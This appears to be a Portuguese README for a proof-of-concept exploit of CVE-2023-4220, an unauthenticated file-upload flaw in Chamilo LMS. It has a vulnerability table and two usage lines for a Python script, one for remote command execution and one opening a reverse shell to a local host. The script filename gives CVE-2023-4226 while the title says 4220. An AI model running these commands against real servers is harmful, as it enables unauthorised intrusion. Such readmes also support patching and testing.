
POC para CVE-2023-4220 - Chamilo LMS: Execução Remota de Código por Upload de Arquivo Grande Não Autenticado
| Produto | Chamilo |
|---|
| Fornecedor | Chamilo |
| Severidade | Alta - Adversários podem explorar vulnerabilidades para obter execução remota de código não autenticada. |
| Versões Afetadas | <= v1.11.24 |
| Versões Testadas | v1.11.24 (versão mais recente no momento da escrita) |
| Identificador CVE | CVE-2023-4220 |
| Descrição CVE | Upload de arquivo sem restrições na funcionalidade de upload de arquivos grandes em /main/inc/lib/javascript/bigupload/inc/bigUpload.php no Chamilo LMS <= v1.11.24 permite que atacantes não autenticados realizem ataques de cross-site scripting persistente e obtenham execução remota de código através do upload de web shell. |
| Classificação CWE | CWE-434: Upload de Arquivo sem Restrições com Tipo Perigoso |
| Classificação CAPEC | CAPEC-650: Upload de uma Web Shell para um Servidor Web |
Para executar comandos diretamente, use o seguinte comando:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
Para obter um shell reverso, use o seguinte comando:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>